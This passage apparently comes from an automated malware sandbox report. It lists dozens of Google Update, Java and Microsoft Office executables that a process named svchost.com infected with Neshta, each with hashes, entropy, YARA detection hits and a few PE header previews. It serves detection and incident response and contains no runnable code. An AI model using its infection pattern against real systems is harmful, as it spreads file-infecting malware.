                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.254081989191424
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbblZ1PNq9uCUOFVSiHdq+sxneZ:sr85Cbbr1Pg9uCRFRzsxeZ
                                                                                                                        MD5:C2C98501C8C0A38CB3B3D89B1CD09C67
                                                                                                                        SHA1:8D8469485BD3995DE34512BAC18DA482A31B5DC2
                                                                                                                        SHA-256:EFB24F3670542E6B491E3B9092E31E5068EDC2068C986F4D96E9F8176F6DCF26
                                                                                                                        SHA-512:10A42C069528EE8D55BE2106F2851B9E26AFEA5311D63D1CEDE860DB6B8E0252C3875422B047A9C6D35FC3D3F8409771A682B67C85CACF0A8D8A9352491FC3E0
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.565853286242963
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPwnvIu/+HCidGL0RYfqJfj+0xUYfQ76:JxqjQ+P04wsmJC6cQZo0xUFGh1SNcs8
                                                                                                                        MD5:2BE98153912196C9044AB31250DEAF28
                                                                                                                        SHA1:18487088B298B9E6B5E7FBDD00D5C37F2ED6AA78
                                                                                                                        SHA-256:47164473C9E34EC71472CB3516C4575D1C8A4484BE1308DD69AAD38CB84D03AD
                                                                                                                        SHA-512:20DB7DFC73249CE140DC3764D8A304A0CE080E9421751CA394829D0A57962D19A86C2A799CD0650DE14CD0CCF56BE887B63E696A9FB0F2D12994DDAB410CB662
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.517183428602308
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPgOCegc5f3E/lwvSHazYLO0K/rdiiA9:JxqjQ+P04wsmJCznxUOoQXALA
                                                                                                                        MD5:10CA92590C0A328CD9DD6B232AC5B97C
                                                                                                                        SHA1:CA9C9D94ACA6666E7655B9A7E3E11EAA23D84119
                                                                                                                        SHA-256:D6E3584260FE9CC093D4E7A33A66C201059296D5BBE30DFDFDD3AD76584192CD
                                                                                                                        SHA-512:5D78BA107880C8D8FACF61EA5C097705E6410C8D2AF8D6D49540B19FD2DDAB9177080B6435D30B9E3448C81DA4C85943456F93A4F3F549DEFD0794AFE85CAD59
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.31341198420156
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMw0wAh3A5sWBMcdSJ+L94ltGTxv5ou:sr85CMuAt2Sk2m5ou
                                                                                                                        MD5:C5CBA627E9C4F07BF06013E2E19A2ADF
                                                                                                                        SHA1:B8678C954DE42C8D686384179EB1835E378C19E3
                                                                                                                        SHA-256:0215077B4DAAC5B17314C2A55673E2416ADAD7CD34E8C33AE748AE22C59A2CC5
                                                                                                                        SHA-512:234455B1C396B38DF98C569584C85CE153423CAC75E9E0DBCB724D9A0795FBCBE6D116185017535CC23ABAC49DCE9C77A9D8F470BE7B899E80C7C7E5086EE76F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.571220400525005
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC85J2AeSh8/J7YGzhc299YX:sr85CRgh2Bh1c27YX
                                                                                                                        MD5:2CE4DFB3663A6C0B5EA20EA10DECE139
                                                                                                                        SHA1:A9D39DDD39D9419D1B0A836E9110BC5E7CE071DA
                                                                                                                        SHA-256:006DC11C857D8EC872D4ECFB6CF70FB1BAB5C95AF8773BBEC11E07C2E0BEFC27
                                                                                                                        SHA-512:0F25FF89C156ED21AFB55F07BE74C8B290C9E42710A3AE3917CE2FEAEE3626FA20E26F1088CF47CC487B18C69E3A1A3B560A321F63EAAB9A3F478822B2B0F904
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.35638621946935
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ1jaG5lO8Ao+MJo1So6lSvUpRGaCJ9K7:JxqjQ+P04wsmJCwNbRu+2Hdt5yG10x
                                                                                                                        MD5:9AC378232CF66E98AC476EE00ACD8A6B
                                                                                                                        SHA1:ADDECA30D06C773A5C6D209646EC64DC0CDF3039
                                                                                                                        SHA-256:F3C6416304690DD5950F44E4721CE140B8932BE7C130204DEE2A623998F0F716
                                                                                                                        SHA-512:F14621706EF7E9E480A13E17B3A0764B93AE06EC6507C2401FC57D29D565397969A98091E373DF06A169C3005537A8E635610F1091AED5B64B8A22D9D253B46E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.572547877647106
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBeljakK11t5rL6Tfr/sVKQ7t:sr85CBkjtQVrY/0
                                                                                                                        MD5:FDB7DA820D2F539A317A598BA31067C8
                                                                                                                        SHA1:C9D147B854A2BB03D782A3BA1C645C525DA0EBD8
                                                                                                                        SHA-256:2D98E44BE09EDB2627AAB1A7AC69FF72CC7C06E24CA77B9F4C14A602B5DD78BB
                                                                                                                        SHA-512:6195C603856129DB9310484D0FD09AF788FDACFC468EC21C3F99E6BE7718AC491D6E001048492C3A67F811EABC062432DCF0EAAE175489B1A63A6CED1E8D8692
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.571346004771877
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjpJaUWSZknGE7YGzh82dlYX:sr85CSsZmGkh182jYX
                                                                                                                        MD5:5BC82420D22E028C2481B8150AD4F793
                                                                                                                        SHA1:9DE41D3BA5DBF3DC259110C5C34E216315DFD327
                                                                                                                        SHA-256:2CAAF2C35A46F53327B11B7EE33B34E1DB112D5C83798BC1B1FEB11A7DD38DD1
                                                                                                                        SHA-512:61A5207DAFC38941A87EBB47B835F212C4D4581F2E3EBE5FE2AEAA7E1D51221DD1805176B0925967B4934754092B364A1A40DEEB778E6817B6BAEC533B367D1A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5964179831347325
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                                                                                        MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                                                                                        SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                                                                                        SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                                                                                        SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.653521772684421
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                                                                        Malicious:true
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.330325009255707
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKMmG2haDkdWIJ7OkUVS:sr85C/qzE+bgOkIS
                                                                                                                        MD5:47848F50CD963815CF2894B7C284095C
                                                                                                                        SHA1:8F8E03058352E172E9158782BC8E315D026CD720
                                                                                                                        SHA-256:115C7F82BED3C1779F50CE53273248152587D8F9421B933C10534B84E16E7815
                                                                                                                        SHA-512:9D692E732A6E0F673A2A4ACC6E7877976FCB2901A874D696ADF2A16EB55C08AB738744811AC9A6AFD5673F2FE272E2C6663B6EB123049F41FA5C1E68EBCD5A8E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.656070779362061
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                                                                        Malicious:true
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6397427450636055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                                                                        Malicious:true
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.346606571165856
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCOLIFaIz9SEhJyurf6S1TWfavAd3VbB:sr85Cb7hfFTkd33
                                                                                                                        MD5:95ED8DD6C4D471F68911840679CA1F9B
                                                                                                                        SHA1:5BDD0A4778F72B6AC95FEEFF108F74E342981690
                                                                                                                        SHA-256:82B98FAF27483CB4C8957A2BC6306C47D59559046C8DCDC03C708C77C36E2417
                                                                                                                        SHA-512:581BD049EDCEC4E330FEC670AF7B2980F1B338FC8588B596555803A43B0BE4232A3376CB314C8F3C9DC615D892D80746EB2E1C60766BDB7E046515DB9751DD8B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.107296013528715
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWnoDdvhQBW1kqanjaYt6Zs8:sr85CaEQQhanIZs8
                                                                                                                        MD5:4141A0DE0BCBE19FA9E93DB323462679
                                                                                                                        SHA1:88F7E506A247D882C4F4E924D1E3DAB0FC077387
                                                                                                                        SHA-256:3CD849C610540723B3785865DFCC8F65B820003251B39ED6594A8A979F20E948
                                                                                                                        SHA-512:940ED87A4C20AE138D388D2324AEBCCA2FC4C93B8D8C2443E91EB382937F79B55BDAD03F595C4EF3FA94D0EC087EA3C228ABB143BBCB79C554E5C3FA38CAA754
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.242980084696127
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZqO55PvVT4zHu+wLZ8qU:sr85CIO55PvV8HVwLZ8qU
                                                                                                                        MD5:18E80CD6901FFDEDD81B44D0526240D4
                                                                                                                        SHA1:640A66FC69235A0B3677A010376FC607CC2B50E6
                                                                                                                        SHA-256:3A70FBA9C369E6FC2DB35AF45D1201833ADEB33B1ACE24603A582D2BACE6ACDF
                                                                                                                        SHA-512:4F62E2168BFCFD0329F12F93FB5783B9D70989852CF9C12339FDED1ACC5C984FCC847555DD223C6EE2C3CEF64DD95F580DB31138F9D2F47E68FF2F6106A3BED3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.2705620011183765
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFtwbWR/v1o/G42UR9whwRrcUTR9EhhBhc:sr85CpnD9UR9whwtvTRMBy
                                                                                                                        MD5:F56F560D473A7660D3AD44E731930A06
                                                                                                                        SHA1:B71090C328FF4234B213D76689591DE15DEBD0F3
                                                                                                                        SHA-256:9B7384DC0D5DBA8C5161DB5C42D3075A4281716F741F10DEF974C5C680308CD0
                                                                                                                        SHA-512:0134B6C093C053343177A83B81A23EEE54BF4C655958906B854B221B85097D633FA96953B83343F6C207BE5A15919017EA26C05DD3B46193618FC26510C6E74F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.110851138659397
                                                                                                                        Encrypted:false
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.46960810763993
                                                                                                                        Encrypted:false
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.448388258977007
                                                                                                                        Encrypted:false
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.285196024262785
                                                                                                                        Encrypted:false
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.72011826313205
                                                                                                                        Encrypted:false
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.169493808225336
                                                                                                                        Encrypted:false
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.3186383734960625
                                                                                                                        Encrypted:false
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.392056642854633
                                                                                                                        Encrypted:false
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.496755886640026
                                                                                                                        Encrypted:false
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.268163712816429
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdi4v7jFil6gu4ayPdTTFDiopJLN:sr85Cc4vHFs6gu4aCdPFDi2
                                                                                                                        MD5:1EF797E5E199041B8A0EB41A50E73185
                                                                                                                        SHA1:2D059C707E2738DD623FF8E4D336D8B90B482451
                                                                                                                        SHA-256:0BB888F08C57AD222A544EB3A73478B4747059277A80F21A03E5655FA21CE119
                                                                                                                        SHA-512:3B08845C01002AF7B35A5BCDCA1D984D7D019EE117F0CB761E3DA608329314067DA1A16ABEBC8AA3FCB602EC58EA77D0F1EE3FC288142DDD0F44970BF431BC77
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.201681837230837
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpSsTITDBkt+ETGBaORneubkuJ:sr85C7IvibTCaOFeubks
                                                                                                                        MD5:D528E65D0A3CFF610803965BAB5D42EE
                                                                                                                        SHA1:A01448DD0C03BAF9B1E287BCB87A58450084BFFA
                                                                                                                        SHA-256:C82DAD16438E79EE2ABC34D1B405F09DE3844FDEF99F9115B58E7D1F7C90C4E9
                                                                                                                        SHA-512:4A0C3C8F49CE25A4D5D06359683DE444EDFC6B49E09323D10F675E5029D584135A80F89A04FE77CB58D4B9BC6522F7E2DC359FC8D6EB8A55F981AB4CC07B91F3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.352529349012904
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkb7zbeu8L16Ytx2XaRSX2qA4i:sr85Ckb7Heu8LSakmP
                                                                                                                        MD5:2249CAFC0B359EA41F137AB87DC151FA
